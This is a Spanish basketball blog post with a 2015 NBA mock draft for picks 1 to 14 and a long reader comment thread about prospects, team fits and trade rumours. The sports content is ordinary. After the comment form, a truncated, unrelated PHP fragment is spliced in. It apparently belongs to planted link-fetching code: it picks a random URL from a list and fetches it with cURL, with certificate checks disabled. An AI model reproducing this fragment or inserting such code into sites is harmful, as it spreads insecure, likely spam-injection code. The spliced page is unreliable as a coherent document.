Mock Draft 2015 2.0: Post lottery

27 de May de 2015 por Viva_Dirk

Ya han pasado casi dos meses desde que os presentamos un primer mock del draft de 2015. En aquella ocasión no se tuvieron en cuenta las necesidad de los equipos pero ahora, una vez celebrado el sorteo y conocidas las posiciones en las que elegirá cada franquicia, este va a ser un factor también importante.

Vamos allá con el mock, que sabemos que hay ganas de hablar de ello.

1.- Minnesotta Timberwolves – Karl-Anthony Towns

Los Wolves podrán juntar a los 3 últimos números uno del draft, aunque en el caso de Anthony Bennett eso no signifique mucho a día de hoy. Tows tiene un potencial tremendo y sus cualidades pueden encajar a la perfección con Gorgui Dieng o Nikola Pekovic ya que por su movilidad y buen tiro de media distancia puede jugar sin problemas de ala-pívot. De hecho con su físico es donde debería marcar mayores diferencias. Sin embargo, es un jugador totalmente por hacer que podría verse perdido en la cancha a nivel NBA. 

2.- Los Angeles Lakers – Jahlil Okafor

Hace 32 años que los Lakers no disponen de una elección tan alta en el draft, exactamente desde que en 1983 eligieran a James Worthy con el número 1. Okafor llegaría para formar una pareja muy prometedora junto a Julius Randle. El pivot de Duke cuenta con un gran juego al poste y una notable capacidad reboteadora. Su defensa y su físico despiertan serias dudas entre los scouts, algo preocupante teniendo en cuenta que su posible compañero en el juego interior tampoco asombra por su gran capacidad atlética.

3.- Philadelphia 76ers – D’Angelo Russell

Otro pick muy alto para los Sixers, veremos si no lo traspasan por un puñado de pipas… Para muchos el ex base de Ohio State es el mejor jugador de la promoción, un combo guard con un talento ofensivo enorme, capacidad de liderazgo y ese toque de locura que Curry está poniendo de moda. Su adaptación al puesto de base sería un bombazo ya que en ahí su físico pasaría de ser un problema a ser una ventaja. Quedaría por comprobar su capacidad defensiva y su adaptación al baloncesto profesional, ya que en los Buckeyes era amo y señor.

4.- New York Knicks – Emmanuel Mudiay

Ligera mala suerte para los Knicks, aunque con el solar que son ahora mismo cualquiera de las 4 primeras elecciones les encaja sin problemas. Mudiay es un base con una potencia física abrumadora, con un primer paso y un cambio de ritmo demoledores. No podemos hablar en exceso de su dirección de juego ni de su defensa, ya que es algo que en la liga china no se puede prácticamente apreciar, pero sí podemos afirmar que juega siempre con una intensidad muy alta y que tendrá que aprender a reducir la marcha cuando toque.

5.- Orlando Magic – Justise Winslow

Los Magic juntan a un grupo de jóvenes espectacular, que deberían empezar a ganar muchos partidos en la conferencia Este si eligen bien el entrenador para los próximos años (parece que Scott Skiles está cerrado). Winslow ha sido el mejor jugador de la final four de la NCAA, ejerciendo de líder para que Duke conquistase el campeonato. Se trata de un chico que juega al 200% cada segundo que está en la pista, defensor implacable con un físico que aprovecha para llegar con facilidad al aro en transiciones con contraataques. Su aportación ofensiva en ataque estático es más reducida aunque posee una buena lectura del juego y puede aportar mucho en cualquier sistema de ataque.

6.- Sacramento Kings – Kristaps Porzingis

Aquí empieza un puzzle casi imposible de descifrar, con muchos jugadores en un mismo escalón y equipos sin necesidades muy claras. Draftear a Porzingis ofrece la posibilidad de draftear una estrella: un jugador de 7 pies con buena mano y que no es una madre en el resto de facetas del juego. Un dúo Cousins-Porzingis debería encajar a la perfección, ya que Cousins podría campar a sus anchas por la zona mientras Kristaps aleja a sus pares de la misma, siendo más rápido que la mayoría de ellos. Evidentemente hay bastantes jugadores de las caracteristicas del letón que han fracasado, y si no cuenta con un número de minutos decente su desarrollo puede verse truncado. Una opción más segura sería Kaminsky, que podría desde el primer día ofrecer un buen rendimiento, pero el techo de Porzingis es mucho más alto.

7.- Denver Nuggets – Mario Hezonja

Otro jugador con una capacidad de progresión muy alta y en este caso en una posición que realmente escasea en la liga. Hezonja reúne unas cualidades atléticas excelentes, buena mano de larga distancia y una buena dosis de agresividad en su juego, podría formar una pareja explosiva con Ty Lawson. En su contra juega la mala cabeza de la que ha hecho gala en varias ocasiones, con una actitud algo infantil o con demasiado ego, algo que no le van a permitir en la NBA al menos no hasta que sea una estrella consagrada. Stanley Johnson a pesar de ser un perfil totalmente distinto, también le iría bien a los Nuggets.

8.- Detroit Pistons – Stanley Johnson

Con la incertidumbre de Monroe, los Pistons acudirán al draft sin una posición específica que cubrir. Todo lo que no sea un center o un base debería tener hueco en la plantilla. Johnson ofrece el perfil de un alero clásico, fuerte, buen defensor, buen reboteador y en este caso una habilidad anotadora nada desdeñable. Por contra, no ha demostrado un buen conocimiento del juego y no finaliza cerca del aro como debería. Myles Turner sería la ‘opción talento’ para acompañar a Drummond si Monroe no sigue.

9.- Charlotte Hornets – Willie Cauley-Stein

Después del batacazo de esta temporada los Hornets disfrutarán de una elección en el top10, que viendo como está el Este debería sumar muy positivamente en su plantilla. Stein suple todas las carencias de Al Jefferson: es pura intensidad, excelso reboteador e intimidador con una gran movilidad. Sin embargo es nulo ofensivamente por si mismo y los Hornets ya eligieron arriba un jugador de parecido perfil como Bismack Biyombo que hasta la fecha es un auténtico fracaso.

10.- Miami Heat – Kelly Oubre

Miami debería elegir un alero salvo que hubiera un jugador muy superior al resto en otra posición y no es el caso. Oubre ofrece una incertidumbre máxima, apenas ha jugado 20 minutos por noche en la universidad y no ha tenido un ‘hype’ final como si han tenido otros. Físicamente es el exterior más poderoso de todos los nombrados, es un tirador aceptable en estático y cuando se pone a defender lo hace muy bien. De momento sus puntos fuertes se han visto eclipsados por su poca ambición, ya que apenas ha mostrado progresos en los aspectos donde no es bueno ‘per se’.

11.- Indiana Pacers – Myles Turner

A la espera de que vuelva Paul George, los Pacers pueden optar por la opción de mayor impacto inmediato, que sería Kaminsky, o por la de mayor potencial, que sería Turner. Myles Turner es un center de 7 pies que puede lanzar consistentemente cerca de la linea de 3 gracias a su amplio rango de tiro y que demuestra buenas aptitudes en el rebote y la intimidación. La ‘trampa’ es que pese a su altura su físico ofrece dudas. Teniendo en cuenta que hasta ahora defensivamente se ha basado en su superioridad física queda por comprobar si será capaz de frenar a jugadores que le sacan 20 kilos. También habrá que ver qué papel ofensivo asume ya que es un center que juega mucho mejor de cara al aro que de espaldas a él.

12.- Utah Jazz – Devin Booker

Con el nivel que presenta el Oeste, los Jazz deben ir sumando piezas útiles, y Booker lo es. Un escolta de casi 2 metros, con una gran muñeca, gran sacrificio sobre la cancha y que aún no ha cumplido los 19 años. Difícilmente tendrá muchos minutos este año pero debería ir madurando en una franquicia que nunca ha metido excesiva prisa a sus jóvenes. Se trata, eso sí, de un jugador con un rol bastante definido de tirador ya que cerca del aro tiene dificultades para anotar y no es muy bueno creándose sus propios tiros. Físicamente deja alguna duda pero podría llegar a ser un buen defensor.

13.- Phoenix Suns – Frank Kaminsky

A estas alturas los Suns no encontrarán nada que mejore sus peores posiciones y el National College Player of the Year puede entrar en la rotación interior desde el primer momento. Con permiso de D’Angelo Russell, Kaminsky es ofensivamente el mejor jugador del draft: sabe lanzar, pasar, postear y lee bien los partidos. En su contra juega su edad (es mayor que bastantes jugadores que llevan ya 2 años en la liga), y que su defensa se basa en su conocimiento del juego ya que físicamente no es un privilegiado.

14.- Oklahoma City – Sam Dekker

Me parece una elección cantada para los Thunders, un jugador muy versátil, gran competidor y que puede ser un gran suplente desde el primer día. Dekker difícilmente será una estrella de la NBA pero también es difícil que no disfrute de una larga carrera en la liga.Para resumir rápidamente sus habilidades podemos decir que ‘sabe jugar a esto’. Entiende el juego y eso con dos bestias como Durant y Westbrook puede darle muy buenos minutos. Para mal, sabemos que su físico no es excelente, que no es un gran tirador y que salvo las tablas que dan la experiencia su juego es el que es.

Comenta

27 comentarios a esta entrada

  1. Triceratops dice:
    #1

    Bueno, vamos alla.

    Pick 1: Si Towns puede jugar de 4, creo que va a ser la elección de Minny, mas cuando creo que Okafor ya ha sacado a pasear sus pocas neuronas diciendo que no quiere jugar en esa ciudad. Aunque tambien hay noticias sobre que Saunders quiere a Okafor a toda costa. Veremos que pasa, no obstante, para mi, el mejor jugador de este Draft es D’Angelo Rusell, por lo que, aunque arriesgado, no estaría mal que los lobos lo eligiesen como pick 1, y traspasaran a Ricardo Rubio + Martin ó Pekovic por unos cuantos jugadores interesantes que le den profundidad al equipo.

    Pick 2: Lo mismo, creo que se decantarán por un hombre grande, dependidendo de quien sea quien elija Minny, pero yo iría a por Rusell que aprendería bastante de Kobe en su primer año.

    Pick 3: Si los dos de antes cogen a los perros grandes, claramente Rusell para los 76ers muy por delante de Mudiay hoy dia. Este tio tiene todo el potencial del mundo para triunfar y convertirse en una megaestrella de la liga, por lo que los 76ers, a diferencia de otros años, se pueden sentir ganadores con este pick 3.

    Pick 4: Los Knicks tienen carencia en todas las posiciones….incluso en la de alero..xD., Pero claramente, Mudiay es el 4º mejor jugador del Draft y el último con condición de convertirse en jugador franquicia.

    Despues de estos 4 jugadores…todo lo que viene me parecen rellenos y jugadores que puden tener una digna carrera NBA, pero no veo ningun crack, ningun futuro jugador franquicia, nadie para liderar un equipo ganador. Despues estallará algua sorpresa en forma de tipico pick 18 que acaba siendo un crack, pero lo veo complicado este año. Continúo….

      Citar

  2. Triceratops dice:
    #2

    Como digo, a partir del pick 4, creo que vamos a ver bastantes rondas traspasadas, y es que creo que algunos de estos jugadores no les vale para nada a algunas de las franquicias que eligen aquí y que necesitan un revulsivo notorio para hacer algo interesante en sus filas tras muchos años de sequía.

    Pick 5: Espero que Orlando coja a Winslow o Stanley Johnson, porque draftear a Porzingis o Hezonja me parecería otra cagada a sumar en la lista. No obstante, en el fondo me da igual, Orlando debe traspasar si o si a quien elija e ir en busca de un caballo ganador. No puede tirarse otro año sumando menos de 30 victorias en una porqueria de Conferencia Este, sería bastante duro para sus cada vez menos aficionados y las arcas del equipo.

    Mi opción sería intentar apostar fuerte, es algo inventado mio, no un rumor, pero podrían apostar por un sign and trade de Tobias Harris mas pick 5 mas Nicholson por Paul George. Sería un paso importante para la franquicia el tener una cabeza visible que lidere claramente este proyecto, aunque sea un tio que le queda una millonada por cobrar y que ya ha tenido una lesión grave. Se necesita algo así y que motive a pez gordo agente libre tipo Aldridge a unirse al equipo.

    ¿Suena bien un Payton-Oladipo-George-Aldridge-Vucevic? Creo que me tocara seguir soñando y ver este quinteto solo en el NBA2K

    Pick 6: Me da que Cousins va a salir traspasado este verano o en febrero. Por lo que creo que los Kings van a proteger su aro con Cauley-Stein. La unica via que veo para retener a Cousins y que éste deje de estar harto de perder eternamente y no colarse ni en PO es ofrecerle un buen proyecto. E igual que en el caso de Orlando, pasa por traspasar la ronda mas McLemore ó incluso Rudy Gay y buscar otra pieza que lidere junto a Cousins otro proyecto.

    Pick 7: Tras el fracaso de Afflalo, Denver debe ir a lo seguro, y esto es , draftear a Stanley Johnson antes que a un extranjero de supuesto potencial que hasta juega poco en el Barcelona llamado Hezonja. Johnson es un excelente defensor, cada vez con mejor tiro de 3 puntos, rebotea bien, trabaja duro y está centrado de la cabeza. Tipico jugador que no será All-Star pero hará facil una buena carrera de 14 años en la liga manteniendose como titular ó jugador muy importante de rotación.

    Pick 8: Dado que Monroe puede pirarse, pillar aquí a Porzingis sería la hostia para los Pistons. Aunque bffff con el recuerdo de Milicic, Okur ó Delfino, los extranjeros nuncan rinden aquí, pero el letón le abriría mucho el campo a la bestia parda de Drummond que debe dar este año un salto importante en su juego y catapultarse como el mejor pivot de la liga.

      Citar

  3. Triceratops dice:
    #3

    Pick 9: Viva Dirk, los Hornets creo que deberían darle una oportunidad a Vonleh, y emplear su pick (si no lo traspasan) en un jugador de perímetro. Aunque es verdad, que si te llega Cauley-Stein sería un premio jugoso. En este caso, y creyendo que Willie saldrá mas arriba, yo iría a por Hezonja, y empezar a rodar al croata dandole bastantes minutos para que cuaje, ya que creo que en el Barça le dan bastante pocos.

    Pick 10: Me gusta Kelly Oubre para los Heat. Es otro jugador de los que nunca será All-Star pero debe hacer larga carrera NBA. Pero…, si no lo tienen pensado hacer via trade, creo que los Heat necesitan urgentemente reforzar su pintura, aunque a estas alturas de Draft es comlplicado. Yo iría a por Kaminsky, como dices, limitadisimo fisicamente pero el tio entiende el basket un monton. Las otras opciones de pintura no me gustan para Miami, Myles Turner me parece un paquete de los gordos, y Trey Lyles me parece que está verdisimo para un equipo como los Heat cuyo objetivo debería ser entrar en Playoffs teniendo a gente como Wade, Bosh y Deng.

    Pick 11: Pues teniendo en cuenta que West ya va teniendo una edad considerable, no estaría mal ir a por el ala-pivot Trey Lyles. Como digo arriba, el tio está verdisimo pero quizas el proximo año sea para los Pacers un año de reconstrucción y de transición.

      Citar

  4. Triceratops dice:
    #4

    Pick 12: Los Jazz….esa franquicia que tan mal me cae pero que también está drafteando ultimamente con Burke, Gobert y Exum…, Pues a estas alturas, pillar a Kelly Oubre sería un premiazo. Como digo en el punto 10,”nunca será All-Star pero debe hacer larga carrera NBA” Dicen que es un dejado, un picha fria , un vago de cojones, pero tras ver algunos videos, me mola bastante, fisicamente es buenisimo, es un atleta en toda regla, no tira mal, entiende bien el juego, y si le inyectan sangre, creo que tiene potencial para ser un buen defensor, ya que tiene unos pedazo brazos tremendo. Da la sensación que es mas alto de lo que es. Lo dicho, un exitazo para los Jazz pillar a Oubre, y seguría flipando con su plantilla.

    Pick 13: Los Suns han sido un equipo valiente estos ultimos años tanto en las canchas como fuera de ellas. Tras la salida de Dragic, y con un Brandon Knight que no sabemos a estas alturas si seguirá, yo me cubriría las espaldas con un base que para mi podría ser el “robo” del Draft, Cameron Payne. Este es otro tio que nunca será All-Star pero va a jugar muuuchos años en la liga. No vas a a ver grandes higlights de este tio, no va a salir en los Top 10 de la jornada, pero es un base inteligente, buen defensor, buen pasador con buenos intangibles y mucho conocimiento del juego. Tipico jugador de los que estoy seguro que a Popovych le gusta

    Pick 14: Devin Booker para los OKC. A caballo entre el escolta y el alero, Booker iría de perlas a los OKC. Gran tirador que se aprovecharía de las ventajas generadas por Durant y Westbrook, sirviendo ademas como una buena apuesta de futuro en caso de que Durant se pire a Lakers el proximo verano (aunque reemplazar a Durant es casi imposible).

      Citar

  5. Triceratops dice:
    #5

    RESUMEN DE MI MOCK

    1) Wolves: Towns
    2) Lakers: Okafor
    3) 76ers: Rusell
    4) Knicks: Mudiay
    5) Magic: Winslow
    6) Kings: Cauley-Stein
    7) Nuggets: Stanley Johnson
    8): Pistons: Porzingis
    9) Hornets: Hezonja
    10) Heat: Kaminski
    11) Pacers: Trey Lyles
    12) Jazz: Oubre
    13) Suns: Cameron Payne
    14: Thunder: Devin Booker.

      Citar

  6. Vader dice:
    #6

    Grandes artículos Viva Dirk y Triceratops!!

    Parece bastante seguro que esto año a partir del pick 5 habrá bastantes traspasos. Este año me quedo a verlo en directo pq podria ser una noche importante para mis Knicks, ya sea por el pick o por si se produce algún traspaso. Me hubiera gustado Russell para los Knicks pero Mudiay tmb me gusta, hace años que necesitamos como el comer un base físico, tan en boga ahora mismo en la liga.

    Draft que será muy interesante para muchas franquicias algunas de ellas historicas de la liga, Knicks, Lakers y tmb Celtics que con tantas rondas podrian hacer algun movimiento potente.

    Saludos!!

      Citar

  7. Triceratops dice:
    #7

    Vader:
    Grandes artículos Viva Dirk y Triceratops!!

    Parece bastante seguro que esto año a partir del pick 5 habrá bastantes traspasos. Este año me quedo a verlo en directo pq podria ser una noche importante para mis Knicks, ya sea por el pick o por si se produce algún traspaso. Me hubiera gustado Russell para los Knicks pero Mudiay tmb me gusta, hace años que necesitamos como el comer un base físico, tan en boga ahora mismo en la liga.

    Draft que será muy interesante para muchas franquicias algunas de ellas historicas de la liga, Knicks, Lakers y tmb Celtics que con tantas rondas podrian hacer algun movimiento potente.

    Saludos!!

    Yo, salvo problema personal, lo veo en directo y lo comentare por aqui, como llevo haciendo los 2 ultimos años. Pero solo hasta el pick 15, ya k desde el 1 al 15 pasa cerca de 2 horas, y hay que trabajar despues

      Citar

  8. Vader dice:
    #8

    Triceratops: Yo, salvo problema personal, lo veo en directo y lo comentare por aqui, como llevo haciendo los 2 ultimos años. Pero solo hasta el pick 15, ya k desde el 1 al 15 pasa cerca de 2 horas, y hay que trabajar despues

    Yo ya he pedido vacaciones ese viernes XD pero igual no aguanto hasta el final por puro sueño…

      Citar

  9. Jose_Dantley dice:
    #9

    Bien planteado.

    Aunque fíjate que igual tengo dudas de si Mudiay se pega algún batacazo.

      Citar

  10. Viva_Dirk dice:
    #10

    Triceratops, los Magic ya tienen el dinero para un agente libre, y si no consiguen firmarlo harían bien en no darle a Tobias un contrato excesivo. Pero si pierden la oportunidad de juntar un juego exterior con Payton-Oladipo-Winslow, con una media de edad de 21 años sería un tremendo error, hablamos de 3 chicos que han mejorado cada año que han jugado, que son extremadamente competitivos y que pueden ser la mejor defensa de perímetro del campeonato.

    Como te digo, si pueden firmar a Aldridge, Monroe o algún otro agente libre hacen lo correcto, Gordon puede ser un gran tercer pivot o jugar minutos de tres aportando mucho. Si no lo consiguen y le dan el dinero a Tobias para que además frene la progresión de los jóvenes, estarán cayendo en un error que muchos otros han cometido.

      Citar

  11. Triceratops dice:
    #11

    Viva_Dirk:
    Triceratops, los Magic ya tienen el dinero para un agente libre, y si no consiguen firmarlo harían bien en no darle a Tobias un contrato excesivo. Pero si pierden la oportunidad de juntar un juego exterior con Payton-Oladipo-Winslow, con una media de edad de 21 años sería un tremendo error, hablamos de 3 chicos que han mejorado cada año que han jugado, que son extremadamente competitivos y que pueden ser la mejor defensa de perímetro del campeonato.

    Como te digo, si pueden firmar a Aldridge, Monroe o algún otro agente libre hacen lo correcto, Gordon puede ser un gran tercer pivot o jugar minutos de tres aportando mucho. Si no lo consiguen y le dan el dinero a Tobias para que además frene la progresión de los jóvenes, estarán cayendo en un error que muchos otros han cometido.

    Payton es manco, Oladipo no es un anotador y si ejerce de eso, se tira las zapatillas y tiene malos %; y Wislow es mas de lo mismo, otro tio con mentalidad defensiva, y si se acaba fichando a Skiles…¿que vamos a ver…partidos de 85 puntos??
    El equipo necesita un gallo, un anotador, un tio que coja la bola y no le queme. Yo iría a por Paul George con Tobias Harris y el pick como principales monedas de cambio, pero lo dicho, es urgente encontrar alquien que anote desde fuera, un anotador compulsivo.

      Citar

  12. txusma dice:
    #12

    “Para que Tobias frene la progresión de los jóvenes”. No es por nada pero Tobias Harris tiene 22 años que según hablas parece que tega 30…

      Citar

  13. Vader dice:
    #13

    txusma:
    “Para que Tobias frene la progresión de los jóvenes”. No es por nada pero Tobias Harris tiene 22 años que según hablas parece que tega 30…

    Otro que ha sonado para Knicks pero que no me cuadra porque se parece mucho a Melo (en cuanto a estilo de jugador y posición en el campo). En cambio Monroe sigue sonando mucho y parece que esta cerca de Knicks.

      Citar

  14. Txusma dice:
    #14

    Hoy han actualizado el mock de draftexpress y ponen a Mudiay en el número 6 de los Knicks. En el 4 los Knicks cogerían a Justise Winslow (?) y en el 5, los Magic a Cauley-Stein.

    Si pillas a Winslow es para jugar con el de 3 y Carmelo de 4 desde el primer día. Cuadra ahí Monroe?

      Citar

  15. Triceratops dice:
    #15

    Txusma:
    Hoy han actualizado el mock de draftexpress y ponen a Mudiay en el número 6 de los Knicks. En el 4 los Knicks cogerían a Justise Winslow (?) y en el 5, los Magic a Cauley-Stein.

    Si pillas a Winslow es para jugar con el de 3 y Carmelo de 4 desde el primer día. Cuadra ahí Monroe?

    Los Knicks no creo que dejen pasar a Mudiay, y si lo hace, creo que Orlando lo seleccionaría aunque sea para utilizarlo como moneda de cambio.

      Citar

  16. Triceratops dice:
    #16

    Txusma:
    Hoy han actualizado el mock de draftexpress y ponen a Mudiay en el número 6 de los Knicks. En el 4 los Knicks cogerían a Justise Winslow (?) y en el 5, los Magic a Cauley-Stein.

    Si pillas a Winslow es para jugar con el de 3 y Carmelo de 4 desde el primer día. Cuadra ahí Monroe?

    Y ademas, creo que hay que ser cenutrio para gastar un pick 5 en Cauley Stein cuando tienes a Vucevic. Vale que el punto fuerte de Cauley-Stein, la defensa, es el punto debil de Vucevic.
    ¿Pero que haces? ¿Traspasas a Vucevic para quedarte con Cauley-Stein de C titular? ¿Te quedas con ambos con Vucevic jugando 34 minutos y el otro solo 14? Para eso ya tienes a O’quinn y no hay que malgastar un pick.
    Me sorprendería mucho que ORL draftease a este center, aunque peores cosas se han visto…

      Citar

  17. Vader dice:
    #17

    Txusma:
    Hoy han actualizado el mock de draftexpress y ponen a Mudiay en el número 6 de los Knicks. En el 4 los Knicks cogerían a Justise Winslow (?) y en el 5, los Magic a Cauley-Stein.

    Si pillas a Winslow es para jugar con el de 3 y Carmelo de 4 desde el primer día. Cuadra ahí Monroe?

    Hay gente que dice que en la NBA ven a Winslow jugando más de 2 que de 3. Un poco al estilo de Jimmy Butler. Jugando de 2 cuadra más porque te aporta la defensa en las alas que no quieres que Melo tenga que hacer; Galloway, Winslow, Melo, 4 defensivo, Monroe. Por ahí tendria sentido Winslow.

    Saludos

      Citar

  18. Triceratops dice:
    #18

    Vader: Hay gente que dice que en la NBA ven a Winslow jugando más de 2 que de 3. Un poco al estilo de Jimmy Butler. Jugando de 2 cuadra más porque te aporta la defensa en las alas que no quieres que Melo tenga que hacer; Galloway, Winslow, Melo, 4 defensivo, Monroe. Por ahí tendria sentido Winslow.

    Saludos

    Y Calderon de base titular?? No sé..muy zumbado de la cabeza debe estar Mudiay para que los Knicks se pensaran no elegirlo

      Citar

  19. Vader dice:
    #19

    Triceratops: Y Calderon de base titular?? No sé..muy zumbado de la cabeza debe estar Mudiay para que los Knicks se pensaran no elegirlo

    Muy zumbando o que tiene un 60% en tiros libres…

    De base titular Calderón, Galloway o quizás algún agente libre como Brandon Knight, quien sabe.

    Saludos.

      Citar

  20. Ruxixón dice:
    #20

    A mí partiendo de la base que me parece complicado que consigan un equipo mínimamente competitivo vía FA para meterse en los playoffs,toda vez que necesitan fichajes en 4 de las 5 posiciones del quinteto,me parece plausible que traspasen el pick e intenten meter a Calde en el pack.Ese Lawson + Faried procedente de los Nuggets que ha sonado estos días,dentro de ese escenario,tiene sentido,dejando a un lado que por perfiles de jugador no casa en exceso con la táctica que quiere imponer en NYK tito Phil.Y desde luego para Denver es un regalo,por más que pudieran comerse a Calderón 2 años más,encajarían a dos elecciones TOP-10 que le cambian la cara a la franquicia.

      Citar

  21. Vader dice:
    #21

    No descarto un traspaso de pick a cambio de un veterano y un pick más bajo pero el rumor de trade con Denver no cuela, seguro que ha salido de Nuggets a los que les iria de lujo ese pick 4 para su reconstrucción. Ni Lawson ni Faried tienen las caracteristicas que busca PJ para los Knicks, Lawson, un base bajito y que necesita mucho balón y Faried un 4 de 2 metros especialista en pick and roll y sin tiro de media distancia y poco IQ, es justo lo contrario a lo que buscan los Knicks.

    Saludos

      Citar

  22. Vader dice:
    #22

    Y me he olvidado añadir, yo creo que los Knicks no lo tienen tan dificil para montar un equipito de playoff este verano. Melo + dos titulares via agencia libre + pick (que ya veremos en que se convierte) + alguno de los actuales jugadores que pueden salir como titulares como Galloway, Calderon, Hardaway o Acy nos quedará un equipo para ir creciendo a poco que se hagan las cosas bien.

    Saludos

      Citar

  23. Jose Luis dice:
    #23

    Holaaaaaaaa

    alguna novedad? quedan 3 dias!!

      Citar

  24. Vader dice:
    #24

    De lo último que he ido leyendo:

    – Towns es fijo con el 1 para Wolves. Parece ser que la franquicia ya se lo ha confirmado al jugador.
    – Si a NY no le llegan Towns, Okafor o Russell lo más probable es que traspasen su ronda por una más baja + veterano.
    – Porzingis parece que escala posiciones, algunos lo dan con el 3 para Sixers viendo los problemas crónicos de lesiones de Emmbid. El mismo Porzingis también ha sonado para Knicks y que pudiera formar pareja con Monroe, el principal objetivo en la agencia libre.
    – Detroit habría planteado a Knicks un intercambio Jennings por Hardaway JR. Los Knicks usarian varias trades-exceptions que tienen para hacer cuadrar los salarios.
    – Kings y Nuggets también prometen emociones fuertes la noche del jueves. Los Kings podrian traspasar su ronda en busca de algún veterano, estan en modo win-now para evitar que Cousins decida marchar. Los Nuggets en cambio al revés, podrian traspasar a Lawson, Faried, Chadler para conseguir más rondas o escalar posiciones (o las dos cosas). Boston también estaría buscando escalar posiciones…

    Y ahora mismo no sabría que más decir pero cada día se van sucediendo más y más rumores 🙂

    Saludos!!

      Citar

  25. Futurman dice:
    #25

    Si un equipo como Wolves, con 15 victorias, acaba cogiendo a Towns por fit (15 victorias!) en vez del mejor jugador como es Okafor es para darles de guantás xD

      Citar

  26. Vader dice:
    #26

    Otro rumor que viene sonando hace días y que no he puesto antes porque no le doy mucho crédito, porque como seguidor de Knicks me parece demasiado bonito, es que Suns traspasarian a Bledsoe y el pick 13 a Knicks por el pick 4 y supongo que Calderón (para equilibrar salarios). No se, no me cuadra mucho… aunque quien sabe, igual hay algo entre Bledsoe y los Suns que nos hemos perdido y realmente están buscando un traspaso. Veremos.

    También suena el interés de Lakers por Cousins (¡¡¿Alguien no esta interesado?!!).

    Los rumores que antes iban apareciendo día a día parece que van saliendo hora tras hora. La cosa se esta acelerando, veremos en que acaba todo.

    Saludos

    P.D: Comprendereis que como seguir de los Knicks y después de la trevesia en el desierto que llevamos desde que se retiro Ewing pensar en unos Knicks con Bledsoe, Melo y Monroe pues eso… que suena muy bien…

      Citar

  27. Ruxixón dice:
    #27

    Me estoy partiendo la caja con seguidores angelinos diciendo que es una estafa dar a Randle y el pick 2 por Cousins…que si reciben el pick 6 todavía.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>